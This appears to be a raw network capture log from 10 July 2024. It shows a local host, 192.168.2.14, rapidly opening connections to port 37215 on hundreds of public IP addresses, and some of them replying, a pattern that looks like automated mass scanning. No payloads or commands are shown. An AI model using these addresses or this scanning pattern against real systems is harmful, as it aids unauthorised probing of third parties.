                                                    Jul 10, 2024 08:26:13.667294025 CEST372154708341.1.91.57192.168.2.14
                                                    Jul 10, 2024 08:26:13.667300940 CEST3721547083197.29.1.45192.168.2.14
                                                    Jul 10, 2024 08:26:13.667306900 CEST372154708320.160.39.35192.168.2.14
                                                    Jul 10, 2024 08:26:13.667316914 CEST3721547083118.99.163.10192.168.2.14
                                                    Jul 10, 2024 08:26:13.667321920 CEST3721547083198.103.136.196192.168.2.14
                                                    Jul 10, 2024 08:26:13.667551041 CEST3721547083197.188.63.137192.168.2.14
                                                    Jul 10, 2024 08:26:13.667556047 CEST3721547083157.147.255.218192.168.2.14
                                                    Jul 10, 2024 08:26:13.667642117 CEST372154708341.217.73.81192.168.2.14
                                                    Jul 10, 2024 08:26:13.667814970 CEST372154708341.147.196.158192.168.2.14
                                                    Jul 10, 2024 08:26:13.667820930 CEST372155131860.167.215.107192.168.2.14
                                                    Jul 10, 2024 08:26:13.667906046 CEST372154708341.243.54.98192.168.2.14
                                                    Jul 10, 2024 08:26:13.667908907 CEST4708337215192.168.2.14197.121.228.31
                                                    Jul 10, 2024 08:26:13.667908907 CEST4708337215192.168.2.14197.3.118.78
                                                    Jul 10, 2024 08:26:13.667908907 CEST4708337215192.168.2.1445.163.188.96
                                                    Jul 10, 2024 08:26:13.667908907 CEST4708337215192.168.2.1425.120.224.153
                                                    Jul 10, 2024 08:26:13.667908907 CEST4708337215192.168.2.14101.72.229.39
                                                    Jul 10, 2024 08:26:13.667908907 CEST4708337215192.168.2.1441.24.96.120
                                                    Jul 10, 2024 08:26:13.667908907 CEST4708337215192.168.2.14197.221.5.111
                                                    Jul 10, 2024 08:26:13.668083906 CEST3979437215192.168.2.14197.242.25.28
                                                    Jul 10, 2024 08:26:13.668083906 CEST3979437215192.168.2.14197.242.25.28
                                                    Jul 10, 2024 08:26:13.668083906 CEST3979437215192.168.2.14197.242.25.28
                                                    Jul 10, 2024 08:26:13.668083906 CEST6058637215192.168.2.14222.117.171.170
                                                    Jul 10, 2024 08:26:13.668083906 CEST6058637215192.168.2.14222.117.171.170
                                                    Jul 10, 2024 08:26:13.668083906 CEST6058637215192.168.2.14222.117.171.170
                                                    Jul 10, 2024 08:26:13.668083906 CEST5892437215192.168.2.1494.88.202.208
                                                    Jul 10, 2024 08:26:13.668262005 CEST3721547083197.84.241.236192.168.2.14
                                                    Jul 10, 2024 08:26:13.668267965 CEST372154708362.183.249.56192.168.2.14
                                                    Jul 10, 2024 08:26:13.668462038 CEST3721547083135.61.226.123192.168.2.14
                                                    Jul 10, 2024 08:26:13.668467045 CEST372154708391.150.143.185192.168.2.14
                                                    Jul 10, 2024 08:26:13.668736935 CEST3721547083157.66.198.140192.168.2.14
                                                    Jul 10, 2024 08:26:13.668788910 CEST3721547083157.197.96.254192.168.2.14
                                                    Jul 10, 2024 08:26:13.668803930 CEST372154708341.214.140.168192.168.2.14
                                                    Jul 10, 2024 08:26:13.668920040 CEST3721547083197.61.134.141192.168.2.14
                                                    Jul 10, 2024 08:26:13.668925047 CEST372154708341.76.157.203192.168.2.14
                                                    Jul 10, 2024 08:26:13.668930054 CEST3721547083157.233.26.183192.168.2.14
                                                    Jul 10, 2024 08:26:13.669047117 CEST3721547083197.55.229.179192.168.2.14
                                                    Jul 10, 2024 08:26:13.669051886 CEST372155131860.167.215.107192.168.2.14
                                                    Jul 10, 2024 08:26:13.669239998 CEST4708337215192.168.2.1441.119.104.76
                                                    Jul 10, 2024 08:26:13.669239998 CEST4708337215192.168.2.1441.72.102.12
                                                    Jul 10, 2024 08:26:13.669239998 CEST4708337215192.168.2.14157.13.78.38
                                                    Jul 10, 2024 08:26:13.669239998 CEST4708337215192.168.2.1441.12.22.49
                                                    Jul 10, 2024 08:26:13.669239998 CEST4708337215192.168.2.14173.197.235.90
                                                    Jul 10, 2024 08:26:13.669240952 CEST4708337215192.168.2.14157.139.203.178
                                                    Jul 10, 2024 08:26:13.669240952 CEST4708337215192.168.2.14100.42.56.139
                                                    Jul 10, 2024 08:26:13.669296026 CEST372155595241.169.70.119192.168.2.14
                                                    Jul 10, 2024 08:26:13.669534922 CEST372154708341.102.82.164192.168.2.14
                                                    Jul 10, 2024 08:26:13.669540882 CEST3721547083157.171.24.16192.168.2.14
                                                    Jul 10, 2024 08:26:13.669544935 CEST372154708341.47.127.132192.168.2.14
                                                    Jul 10, 2024 08:26:13.669555902 CEST372154708341.184.166.162192.168.2.14
                                                    Jul 10, 2024 08:26:13.669620037 CEST4708337215192.168.2.1441.11.106.64
                                                    Jul 10, 2024 08:26:13.669620037 CEST4708337215192.168.2.14222.149.55.42
                                                    Jul 10, 2024 08:26:13.669620037 CEST4708337215192.168.2.14157.97.135.42
                                                    Jul 10, 2024 08:26:13.669620037 CEST4708337215192.168.2.1441.97.247.254
                                                    Jul 10, 2024 08:26:13.669620037 CEST4708337215192.168.2.14157.75.247.179
                                                    Jul 10, 2024 08:26:13.669620037 CEST4708337215192.168.2.14197.124.185.91
                                                    Jul 10, 2024 08:26:13.669620037 CEST4708337215192.168.2.14157.201.16.191
                                                    Jul 10, 2024 08:26:13.669687986 CEST372154596641.88.70.4192.168.2.14
                                                    Jul 10, 2024 08:26:13.670002937 CEST5893237215192.168.2.1441.98.208.163
                                                    Jul 10, 2024 08:26:13.670003891 CEST5260037215192.168.2.1487.206.189.34
                                                    Jul 10, 2024 08:26:13.670089960 CEST5722837215192.168.2.14130.143.57.173
                                                    Jul 10, 2024 08:26:13.670190096 CEST372154708341.61.218.77192.168.2.14
                                                    Jul 10, 2024 08:26:13.670203924 CEST3721547083197.40.77.219192.168.2.14
                                                    Jul 10, 2024 08:26:13.670207977 CEST3721551910197.144.119.38192.168.2.14
                                                    Jul 10, 2024 08:26:13.670331001 CEST372154708341.7.105.30192.168.2.14
                                                    Jul 10, 2024 08:26:13.670336008 CEST3721547083157.89.161.200192.168.2.14
                                                    Jul 10, 2024 08:26:13.670341015 CEST372155595241.169.70.119192.168.2.14
                                                    Jul 10, 2024 08:26:13.670650959 CEST4708337215192.168.2.14157.219.108.67
                                                    Jul 10, 2024 08:26:13.670650959 CEST4708337215192.168.2.14157.170.129.43
                                                    Jul 10, 2024 08:26:13.670650959 CEST4708337215192.168.2.14197.207.128.29
                                                    Jul 10, 2024 08:26:13.670650959 CEST4708337215192.168.2.14157.244.217.142
                                                    Jul 10, 2024 08:26:13.670650959 CEST4708337215192.168.2.14197.102.64.138
                                                    Jul 10, 2024 08:26:13.670650959 CEST4708337215192.168.2.14157.28.33.71
                                                    Jul 10, 2024 08:26:13.670650959 CEST4708337215192.168.2.1466.140.103.139
                                                    Jul 10, 2024 08:26:13.671015978 CEST3721547083112.53.218.40192.168.2.14
                                                    Jul 10, 2024 08:26:13.671025991 CEST3721547083201.45.1.6192.168.2.14
                                                    Jul 10, 2024 08:26:13.671035051 CEST372154596641.88.70.4192.168.2.14
                                                    Jul 10, 2024 08:26:13.671040058 CEST3721547083197.48.46.233192.168.2.14
                                                    Jul 10, 2024 08:26:13.671044111 CEST372155595241.169.70.119192.168.2.14
                                                    Jul 10, 2024 08:26:13.671106100 CEST372155487495.155.239.144192.168.2.14
                                                    Jul 10, 2024 08:26:13.671111107 CEST372154708346.52.100.241192.168.2.14
                                                    Jul 10, 2024 08:26:13.671116114 CEST3721547083157.113.226.4192.168.2.14
                                                    Jul 10, 2024 08:26:13.671124935 CEST3721551910197.144.119.38192.168.2.14
                                                    Jul 10, 2024 08:26:13.671129942 CEST3721540792179.100.17.30192.168.2.14
                                                    Jul 10, 2024 08:26:13.671569109 CEST3721547083197.158.66.176192.168.2.14
                                                    Jul 10, 2024 08:26:13.671571016 CEST5892437215192.168.2.1494.88.202.208
                                                    Jul 10, 2024 08:26:13.671571970 CEST5892437215192.168.2.1494.88.202.208
                                                    Jul 10, 2024 08:26:13.671571970 CEST4017437215192.168.2.14157.132.219.156
                                                    Jul 10, 2024 08:26:13.671571970 CEST4017437215192.168.2.14157.132.219.156
                                                    Jul 10, 2024 08:26:13.671571970 CEST4287037215192.168.2.1441.124.94.167
                                                    Jul 10, 2024 08:26:13.671571970 CEST4017437215192.168.2.14157.132.219.156
                                                    Jul 10, 2024 08:26:13.671571970 CEST5766437215192.168.2.1441.14.235.23
                                                    Jul 10, 2024 08:26:13.671571970 CEST5766437215192.168.2.1441.14.235.23
                                                    Jul 10, 2024 08:26:13.671574116 CEST372154708341.176.155.18192.168.2.14
                                                    Jul 10, 2024 08:26:13.671580076 CEST372154708341.181.187.155192.168.2.14
                                                    Jul 10, 2024 08:26:13.671585083 CEST3721547083157.188.108.50192.168.2.14
                                                    Jul 10, 2024 08:26:13.671597958 CEST4141037215192.168.2.14121.184.217.108
                                                    Jul 10, 2024 08:26:13.671597958 CEST5054037215192.168.2.1441.42.255.166
                                                    Jul 10, 2024 08:26:13.671601057 CEST372154596641.88.70.4192.168.2.14
                                                    Jul 10, 2024 08:26:13.671597958 CEST3543837215192.168.2.1441.98.73.252
                                                    Jul 10, 2024 08:26:13.671605110 CEST3721540792179.100.17.30192.168.2.14
                                                    Jul 10, 2024 08:26:13.671714067 CEST372154708341.207.52.30192.168.2.14
                                                    Jul 10, 2024 08:26:13.671721935 CEST3721540792179.100.17.30192.168.2.14
                                                    Jul 10, 2024 08:26:13.671726942 CEST372154708341.34.132.102192.168.2.14
                                                    Jul 10, 2024 08:26:13.671973944 CEST3721547083123.87.232.149192.168.2.14
                                                    Jul 10, 2024 08:26:13.671978951 CEST3721547083197.156.19.179192.168.2.14
                                                    Jul 10, 2024 08:26:13.671983957 CEST3721547083157.118.25.219192.168.2.14
                                                    Jul 10, 2024 08:26:13.672075987 CEST4708337215192.168.2.14197.25.112.210
                                                    Jul 10, 2024 08:26:13.672075987 CEST4708337215192.168.2.1441.247.159.119
                                                    Jul 10, 2024 08:26:13.672075987 CEST4708337215192.168.2.14197.34.102.38
                                                    Jul 10, 2024 08:26:13.672075987 CEST4708337215192.168.2.14197.129.185.166
                                                    Jul 10, 2024 08:26:13.672075987 CEST4708337215192.168.2.14157.167.26.235
                                                    Jul 10, 2024 08:26:13.672075987 CEST4708337215192.168.2.1441.95.242.218
                                                    Jul 10, 2024 08:26:13.672075987 CEST4708337215192.168.2.14190.127.112.232
                                                    Jul 10, 2024 08:26:13.672075987 CEST4708337215192.168.2.14197.162.237.81
                                                    Jul 10, 2024 08:26:13.672163010 CEST5668237215192.168.2.14197.201.240.242
                                                    Jul 10, 2024 08:26:13.672163010 CEST5668237215192.168.2.14197.201.240.242
                                                    Jul 10, 2024 08:26:13.672163010 CEST4708337215192.168.2.14168.217.17.83
                                                    Jul 10, 2024 08:26:13.672163010 CEST4708337215192.168.2.1441.112.187.177
                                                    Jul 10, 2024 08:26:13.672163010 CEST4708337215192.168.2.14157.126.140.59
                                                    Jul 10, 2024 08:26:13.672163010 CEST4708337215192.168.2.14157.219.159.174
                                                    Jul 10, 2024 08:26:13.672163963 CEST4708337215192.168.2.14203.154.240.215
                                                    Jul 10, 2024 08:26:13.672163963 CEST4708337215192.168.2.14157.39.65.131
                                                    Jul 10, 2024 08:26:13.672398090 CEST3721555732157.87.64.40192.168.2.14
                                                    Jul 10, 2024 08:26:13.672486067 CEST3721547083197.233.245.82192.168.2.14
                                                    Jul 10, 2024 08:26:13.672564983 CEST3721547083138.52.212.198192.168.2.14
                                                    Jul 10, 2024 08:26:13.672569036 CEST3721547083203.8.230.173192.168.2.14
                                                    Jul 10, 2024 08:26:13.672588110 CEST3721547083202.161.171.144192.168.2.14
                                                    Jul 10, 2024 08:26:13.672591925 CEST3721547083155.236.238.172192.168.2.14
                                                    Jul 10, 2024 08:26:13.672600985 CEST3721542228157.109.246.76192.168.2.14
                                                    Jul 10, 2024 08:26:13.672821045 CEST5106037215192.168.2.1441.56.53.244
                                                    Jul 10, 2024 08:26:13.672821045 CEST5262237215192.168.2.14211.46.225.222
                                                    Jul 10, 2024 08:26:13.672821045 CEST5777437215192.168.2.14197.21.88.223
                                                    Jul 10, 2024 08:26:13.672821999 CEST4253437215192.168.2.14197.133.173.153
                                                    Jul 10, 2024 08:26:13.672821999 CEST5009237215192.168.2.14197.228.49.100
                                                    Jul 10, 2024 08:26:13.672821999 CEST5009237215192.168.2.14197.228.49.100
                                                    Jul 10, 2024 08:26:13.672821999 CEST5009237215192.168.2.14197.228.49.100
                                                    Jul 10, 2024 08:26:13.672821999 CEST3477437215192.168.2.1441.18.203.174
                                                    Jul 10, 2024 08:26:13.672852993 CEST4708337215192.168.2.1485.151.184.225
                                                    Jul 10, 2024 08:26:13.672852993 CEST4708337215192.168.2.14197.39.248.209
                                                    Jul 10, 2024 08:26:13.672852993 CEST4708337215192.168.2.1441.213.18.28
                                                    Jul 10, 2024 08:26:13.672852993 CEST4708337215192.168.2.1476.18.21.48
                                                    Jul 10, 2024 08:26:13.672852993 CEST4708337215192.168.2.14157.1.239.4
                                                    Jul 10, 2024 08:26:13.672852993 CEST4708337215192.168.2.14197.97.197.90
                                                    Jul 10, 2024 08:26:13.672852993 CEST4708337215192.168.2.14197.183.104.5
                                                    Jul 10, 2024 08:26:13.672852993 CEST4708337215192.168.2.14157.82.104.201
                                                    Jul 10, 2024 08:26:13.672899008 CEST3721547083107.106.58.47192.168.2.14
                                                    Jul 10, 2024 08:26:13.672904015 CEST372154708341.158.154.50192.168.2.14
                                                    Jul 10, 2024 08:26:13.672981977 CEST3721555732157.87.64.40192.168.2.14
                                                    Jul 10, 2024 08:26:13.672992945 CEST3721547083157.126.189.94192.168.2.14
                                                    Jul 10, 2024 08:26:13.673536062 CEST3721555732157.87.64.40192.168.2.14
                                                    Jul 10, 2024 08:26:13.673541069 CEST37215470838.114.215.159192.168.2.14
                                                    Jul 10, 2024 08:26:13.673605919 CEST3721542228157.109.246.76192.168.2.14
                                                    Jul 10, 2024 08:26:13.673762083 CEST3721547083197.121.228.31192.168.2.14
                                                    Jul 10, 2024 08:26:13.673780918 CEST372154708341.223.199.219192.168.2.14
                                                    Jul 10, 2024 08:26:13.673913002 CEST3721542228157.109.246.76192.168.2.14
                                                    Jul 10, 2024 08:26:13.673918962 CEST3721539794197.242.25.28192.168.2.14
                                                    Jul 10, 2024 08:26:13.673960924 CEST4708337215192.168.2.14197.232.29.139
                                                    Jul 10, 2024 08:26:13.673960924 CEST4708337215192.168.2.14197.130.93.226
                                                    Jul 10, 2024 08:26:13.673960924 CEST3308037215192.168.2.14183.199.201.1
                                                    Jul 10, 2024 08:26:13.673960924 CEST3536037215192.168.2.14197.236.77.231
                                                    Jul 10, 2024 08:26:13.673960924 CEST4920437215192.168.2.14197.163.145.16
                                                    Jul 10, 2024 08:26:13.673960924 CEST3566237215192.168.2.1441.253.214.217
                                                    Jul 10, 2024 08:26:13.673960924 CEST5335837215192.168.2.1441.186.143.177
                                                    Jul 10, 2024 08:26:13.673960924 CEST3933237215192.168.2.1441.11.123.229
                                                    Jul 10, 2024 08:26:13.674026012 CEST3721539794197.242.25.28192.168.2.14
                                                    Jul 10, 2024 08:26:13.674031019 CEST3721547083197.3.118.78192.168.2.14
                                                    Jul 10, 2024 08:26:13.674124956 CEST3721547083157.188.37.55192.168.2.14
                                                    Jul 10, 2024 08:26:13.674175024 CEST3721556682197.201.240.242192.168.2.14
                                                    Jul 10, 2024 08:26:13.674356937 CEST372154708341.173.154.255192.168.2.14
                                                    Jul 10, 2024 08:26:13.674499989 CEST372154708341.119.104.76192.168.2.14
                                                    Jul 10, 2024 08:26:13.674504995 CEST372154708345.163.188.96192.168.2.14
                                                    Jul 10, 2024 08:26:13.674787045 CEST3721547083157.55.213.252192.168.2.14
                                                    Jul 10, 2024 08:26:13.674792051 CEST3721547083197.156.232.180192.168.2.14
                                                    Jul 10, 2024 08:26:13.675048113 CEST3721547083181.60.226.151192.168.2.14
                                                    Jul 10, 2024 08:26:13.675052881 CEST372154708341.112.216.136192.168.2.14
                                                    Jul 10, 2024 08:26:13.675057888 CEST372154708341.72.102.12192.168.2.14
                                                    Jul 10, 2024 08:26:13.675079107 CEST3721547083157.122.97.99192.168.2.14
                                                    Jul 10, 2024 08:26:13.675082922 CEST3721539794197.242.25.28192.168.2.14
                                                    Jul 10, 2024 08:26:13.675380945 CEST3721532910174.33.110.226192.168.2.14
                                                    Jul 10, 2024 08:26:13.675559998 CEST5766437215192.168.2.1441.14.235.23
                                                    Jul 10, 2024 08:26:13.675559998 CEST3666637215192.168.2.1442.81.26.219
                                                    Jul 10, 2024 08:26:13.675559998 CEST3433637215192.168.2.14197.112.168.229
                                                    Jul 10, 2024 08:26:13.675559998 CEST3433637215192.168.2.14197.112.168.229
                                                    Jul 10, 2024 08:26:13.675559998 CEST3433637215192.168.2.14197.112.168.229
                                                    Jul 10, 2024 08:26:13.675559998 CEST3321437215192.168.2.14197.117.175.135
                                                    Jul 10, 2024 08:26:13.675559998 CEST3360837215192.168.2.14197.70.151.58
                                                    Jul 10, 2024 08:26:13.675831079 CEST372154708341.11.106.64192.168.2.14
                                                    Jul 10, 2024 08:26:13.675884962 CEST372155893241.98.208.163192.168.2.14
                                                    Jul 10, 2024 08:26:13.675901890 CEST3721560586222.117.171.170192.168.2.14
                                                    Jul 10, 2024 08:26:13.675931931 CEST3721560586222.117.171.170192.168.2.14
                                                    Jul 10, 2024 08:26:13.675936937 CEST3721547083197.150.116.159192.168.2.14
                                                    Jul 10, 2024 08:26:13.675941944 CEST3721547083157.13.78.38192.168.2.14
                                                    Jul 10, 2024 08:26:13.676085949 CEST3721547083157.219.108.67192.168.2.14
                                                    Jul 10, 2024 08:26:13.676100016 CEST372154708341.12.22.49192.168.2.14
                                                    Jul 10, 2024 08:26:13.676105022 CEST3721547083157.170.129.43192.168.2.14
                                                    Jul 10, 2024 08:26:13.676110029 CEST3721547083157.127.53.185192.168.2.14
                                                    Jul 10, 2024 08:26:13.676224947 CEST3721557228130.143.57.173192.168.2.14
                                                    Jul 10, 2024 08:26:13.676449060 CEST372155260087.206.189.34192.168.2.14
                                                    Jul 10, 2024 08:26:13.676453114 CEST3721560586222.117.171.170192.168.2.14
                                                    Jul 10, 2024 08:26:13.676456928 CEST3721547083222.149.55.42192.168.2.14
                                                    Jul 10, 2024 08:26:13.676471949 CEST3721547083173.197.235.90192.168.2.14
                                                    Jul 10, 2024 08:26:13.676605940 CEST4708337215192.168.2.14197.44.253.73
                                                    Jul 10, 2024 08:26:13.676605940 CEST4708337215192.168.2.14157.201.102.76
                                                    Jul 10, 2024 08:26:13.676605940 CEST4708337215192.168.2.14200.85.31.170
                                                    Jul 10, 2024 08:26:13.676605940 CEST4708337215192.168.2.14197.12.37.183
                                                    Jul 10, 2024 08:26:13.676605940 CEST4708337215192.168.2.14157.43.78.19
                                                    Jul 10, 2024 08:26:13.676605940 CEST4708337215192.168.2.14197.185.93.52
                                                    Jul 10, 2024 08:26:13.676605940 CEST4708337215192.168.2.14157.133.113.199
                                                    Jul 10, 2024 08:26:13.676605940 CEST4708337215192.168.2.14157.212.231.195
                                                    Jul 10, 2024 08:26:13.676930904 CEST372155892494.88.202.208192.168.2.14
                                                    Jul 10, 2024 08:26:13.676937103 CEST3721547083157.139.203.178192.168.2.14
                                                    Jul 10, 2024 08:26:13.676939011 CEST5096637215192.168.2.14197.168.135.189
                                                    Jul 10, 2024 08:26:13.676939011 CEST5487437215192.168.2.1495.155.239.144
                                                    Jul 10, 2024 08:26:13.676939011 CEST4079237215192.168.2.14179.100.17.30
                                                    Jul 10, 2024 08:26:13.676939964 CEST4708337215192.168.2.14197.216.46.159
                                                    Jul 10, 2024 08:26:13.676939964 CEST4708337215192.168.2.1463.252.228.50
                                                    Jul 10, 2024 08:26:13.676939964 CEST4708337215192.168.2.14197.236.188.222
                                                    Jul 10, 2024 08:26:13.676939964 CEST4708337215192.168.2.14168.44.206.101
                                                    Jul 10, 2024 08:26:13.677002907 CEST3721547083157.32.209.207192.168.2.14
                                                    Jul 10, 2024 08:26:13.677010059 CEST3721547083197.207.128.29192.168.2.14
                                                    Jul 10, 2024 08:26:13.677022934 CEST372154708325.120.224.153192.168.2.14
                                                    Jul 10, 2024 08:26:13.677032948 CEST3721547083157.97.135.42192.168.2.14
                                                    Jul 10, 2024 08:26:13.677058935 CEST4708337215192.168.2.14197.207.60.35
                                                    Jul 10, 2024 08:26:13.677059889 CEST5899837215192.168.2.14157.163.102.21
                                                    Jul 10, 2024 08:26:13.677059889 CEST3340637215192.168.2.14157.32.119.0
                                                    Jul 10, 2024 08:26:13.677059889 CEST6099837215192.168.2.1441.64.116.206
                                                    Jul 10, 2024 08:26:13.677059889 CEST4350637215192.168.2.14157.17.22.189
                                                    Jul 10, 2024 08:26:13.677059889 CEST4115037215192.168.2.14157.195.182.4
                                                    Jul 10, 2024 08:26:13.677059889 CEST4635837215192.168.2.14157.97.0.66
                                                    Jul 10, 2024 08:26:13.677059889 CEST3430437215192.168.2.1438.16.177.91
                                                    Jul 10, 2024 08:26:13.677194118 CEST372154708341.219.191.73192.168.2.14
                                                    Jul 10, 2024 08:26:13.677197933 CEST372155892494.88.202.208192.168.2.14
                                                    Jul 10, 2024 08:26:13.677201986 CEST3721541410121.184.217.108192.168.2.14
                                                    Jul 10, 2024 08:26:13.677287102 CEST3721556682197.201.240.242192.168.2.14
                                                    Jul 10, 2024 08:26:13.677290916 CEST372155892494.88.202.208192.168.2.14
                                                    Jul 10, 2024 08:26:13.677298069 CEST3721556682197.201.240.242192.168.2.14
                                                    Jul 10, 2024 08:26:13.677448988 CEST372155054041.42.255.166192.168.2.14
                                                    Jul 10, 2024 08:26:13.677453995 CEST3721547083168.217.17.83192.168.2.14
                                                    Jul 10, 2024 08:26:13.677577972 CEST3721540174157.132.219.156192.168.2.14
                                                    Jul 10, 2024 08:26:13.677804947 CEST372153543841.98.73.252192.168.2.14
                                                    Jul 10, 2024 08:26:13.677810907 CEST3721547083100.42.56.139192.168.2.14
                                                    Jul 10, 2024 08:26:13.677824020 CEST3721547083197.25.112.210192.168.2.14
                                                    Jul 10, 2024 08:26:13.677954912 CEST3721547083157.244.217.142192.168.2.14
                                                    Jul 10, 2024 08:26:13.678118944 CEST372154708341.97.247.254192.168.2.14
                                                    Jul 10, 2024 08:26:13.678123951 CEST3721547083101.72.229.39192.168.2.14
                                                    Jul 10, 2024 08:26:13.678244114 CEST372154708341.112.187.177192.168.2.14
                                                    Jul 10, 2024 08:26:13.678275108 CEST372154708341.24.96.120192.168.2.14
                                                    Jul 10, 2024 08:26:13.678306103 CEST4708337215192.168.2.14171.118.169.59
                                                    Jul 10, 2024 08:26:13.678306103 CEST4708337215192.168.2.14163.153.43.41
                                                    Jul 10, 2024 08:26:13.678306103 CEST4708337215192.168.2.14157.118.229.105
                                                    Jul 10, 2024 08:26:13.678306103 CEST4708337215192.168.2.14157.255.162.175
                                                    Jul 10, 2024 08:26:13.678306103 CEST4708337215192.168.2.14157.73.160.11
                                                    Jul 10, 2024 08:26:13.678306103 CEST4708337215192.168.2.1441.170.228.135
                                                    Jul 10, 2024 08:26:13.678306103 CEST4708337215192.168.2.14197.175.137.135
                                                    Jul 10, 2024 08:26:13.678352118 CEST372154708341.247.159.119192.168.2.14
                                                    Jul 10, 2024 08:26:13.678548098 CEST5497437215192.168.2.14197.33.215.163
                                                    Jul 10, 2024 08:26:13.678549051 CEST4558037215192.168.2.14157.174.22.21
                                                    Jul 10, 2024 08:26:13.678549051 CEST3696237215192.168.2.14218.155.109.158
                                                    Jul 10, 2024 08:26:13.678549051 CEST3591037215192.168.2.14157.185.96.227
                                                    Jul 10, 2024 08:26:13.678549051 CEST3776637215192.168.2.14187.145.136.229
                                                    Jul 10, 2024 08:26:13.678549051 CEST5565637215192.168.2.14197.162.249.93
                                                    Jul 10, 2024 08:26:13.678549051 CEST4331437215192.168.2.14113.87.153.122
                                                    Jul 10, 2024 08:26:13.678606987 CEST3721547083197.102.64.138192.168.2.14
                                                    Jul 10, 2024 08:26:13.678612947 CEST3721547083197.34.102.38192.168.2.14
                                                    Jul 10, 2024 08:26:13.678615093 CEST4744437215192.168.2.1453.40.112.156
                                                    Jul 10, 2024 08:26:13.678615093 CEST4563237215192.168.2.1441.102.253.177
                                                    Jul 10, 2024 08:26:13.678617001 CEST3721540174157.132.219.156192.168.2.14
                                                    Jul 10, 2024 08:26:13.678615093 CEST5496437215192.168.2.1441.79.104.100
                                                    Jul 10, 2024 08:26:13.678615093 CEST5316837215192.168.2.14100.133.62.95
                                                    Jul 10, 2024 08:26:13.678615093 CEST3335237215192.168.2.14157.18.107.179
                                                    Jul 10, 2024 08:26:13.678702116 CEST372155106041.56.53.244192.168.2.14
                                                    Jul 10, 2024 08:26:13.678706884 CEST372154708385.151.184.225192.168.2.14
                                                    Jul 10, 2024 08:26:13.678711891 CEST3721547083197.221.5.111192.168.2.14
                                                    Jul 10, 2024 08:26:13.678776979 CEST4708337215192.168.2.1441.143.220.37
                                                    Jul 10, 2024 08:26:13.678776979 CEST4708337215192.168.2.1441.197.64.33
                                                    Jul 10, 2024 08:26:13.678776979 CEST5386837215192.168.2.1441.27.9.102
                                                    Jul 10, 2024 08:26:13.678776979 CEST3754837215192.168.2.1441.161.185.105
                                                    Jul 10, 2024 08:26:13.678776979 CEST3672437215192.168.2.1441.111.125.2
                                                    Jul 10, 2024 08:26:13.678777933 CEST3495637215192.168.2.14157.118.78.26
                                                    Jul 10, 2024 08:26:13.678777933 CEST3359637215192.168.2.1441.70.63.61
                                                    Jul 10, 2024 08:26:13.678777933 CEST3349037215192.168.2.14218.144.238.52
                                                    Jul 10, 2024 08:26:13.678941965 CEST3721547083197.129.185.166192.168.2.14
                                                    Jul 10, 2024 08:26:13.678972960 CEST4813237215192.168.2.14197.152.159.76
                                                    Jul 10, 2024 08:26:13.679025888 CEST3721547083197.39.248.209192.168.2.14
                                                    Jul 10, 2024 08:26:13.679030895 CEST3721547083157.167.26.235192.168.2.14
                                                    Jul 10, 2024 08:26:13.679034948 CEST372154287041.124.94.167192.168.2.14
                                                    Jul 10, 2024 08:26:13.679258108 CEST3721552622211.46.225.222192.168.2.14
                                                    Jul 10, 2024 08:26:13.679332018 CEST372154708341.213.18.28192.168.2.14
                                                    Jul 10, 2024 08:26:13.679337025 CEST3721547083197.232.29.139192.168.2.14
                                                    Jul 10, 2024 08:26:13.679341078 CEST372154708376.18.21.48192.168.2.14
                                                    Jul 10, 2024 08:26:13.679578066 CEST3721547083197.130.93.226192.168.2.14
                                                    Jul 10, 2024 08:26:13.679652929 CEST3721547083157.75.247.179192.168.2.14
                                                    Jul 10, 2024 08:26:13.679713011 CEST3721533080183.199.201.1192.168.2.14
                                                    Jul 10, 2024 08:26:13.679872036 CEST3721547083157.28.33.71192.168.2.14
                                                    Jul 10, 2024 08:26:13.679877043 CEST3721540174157.132.219.156192.168.2.14
                                                    Jul 10, 2024 08:26:13.679989100 CEST3721557774197.21.88.223192.168.2.14
                                                    Jul 10, 2024 08:26:13.680136919 CEST3721535360197.236.77.231192.168.2.14
                                                    Jul 10, 2024 08:26:13.680428028 CEST3721547083157.126.140.59192.168.2.14
                                                    Jul 10, 2024 08:26:13.680433035 CEST3721542534197.133.173.153192.168.2.14
                                                    Jul 10, 2024 08:26:13.680438042 CEST372155766441.14.235.23192.168.2.14
                                                    Jul 10, 2024 08:26:13.680669069 CEST3721547083157.1.239.4192.168.2.14
                                                    Jul 10, 2024 08:26:13.680675030 CEST3721549204197.163.145.16192.168.2.14
                                                    Jul 10, 2024 08:26:13.680838108 CEST372154708341.95.242.218192.168.2.14
                                                    Jul 10, 2024 08:26:13.680843115 CEST3721550092197.228.49.100192.168.2.14
                                                    Jul 10, 2024 08:26:13.680891037 CEST3721547083157.219.159.174192.168.2.14
                                                    Jul 10, 2024 08:26:13.680977106 CEST4708337215192.168.2.14157.0.207.158
                                                    Jul 10, 2024 08:26:13.680977106 CEST4708337215192.168.2.14197.136.239.219
                                                    Jul 10, 2024 08:26:13.680977106 CEST4708337215192.168.2.14197.222.215.85
                                                    Jul 10, 2024 08:26:13.682037115 CEST4708337215192.168.2.14197.244.196.112
                                                    Jul 10, 2024 08:26:13.682037115 CEST4708337215192.168.2.14157.194.72.163
                                                    Jul 10, 2024 08:26:13.682037115 CEST4708337215192.168.2.14202.117.4.42
                                                    Jul 10, 2024 08:26:13.682037115 CEST4708337215192.168.2.14197.45.77.62
                                                    Jul 10, 2024 08:26:13.682037115 CEST4708337215192.168.2.14131.33.205.1
                                                    Jul 10, 2024 08:26:13.682037115 CEST4708337215192.168.2.14157.70.238.225
                                                    Jul 10, 2024 08:26:13.682037115 CEST4708337215192.168.2.1472.80.90.34
                                                    Jul 10, 2024 08:26:13.682037115 CEST4708337215192.168.2.14197.105.243.227
                                                    Jul 10, 2024 08:26:13.682115078 CEST4708337215192.168.2.1441.32.202.23
                                                    Jul 10, 2024 08:26:13.682115078 CEST4708337215192.168.2.1441.175.232.89
                                                    Jul 10, 2024 08:26:13.682115078 CEST4708337215192.168.2.14157.151.198.212
                                                    Jul 10, 2024 08:26:13.682115078 CEST4708337215192.168.2.14197.140.106.97
                                                    Jul 10, 2024 08:26:13.682115078 CEST4708337215192.168.2.1441.172.101.128
                                                    Jul 10, 2024 08:26:13.682115078 CEST4708337215192.168.2.1441.241.39.217
                                                    Jul 10, 2024 08:26:13.682115078 CEST4708337215192.168.2.1427.109.189.153
                                                    Jul 10, 2024 08:26:13.682488918 CEST5387237215192.168.2.14191.77.251.99
                                                    Jul 10, 2024 08:26:13.682488918 CEST4016637215192.168.2.14157.27.79.255
                                                    Jul 10, 2024 08:26:13.682488918 CEST5591237215192.168.2.14197.12.236.158
                                                    Jul 10, 2024 08:26:13.682488918 CEST4293437215192.168.2.14197.175.14.150
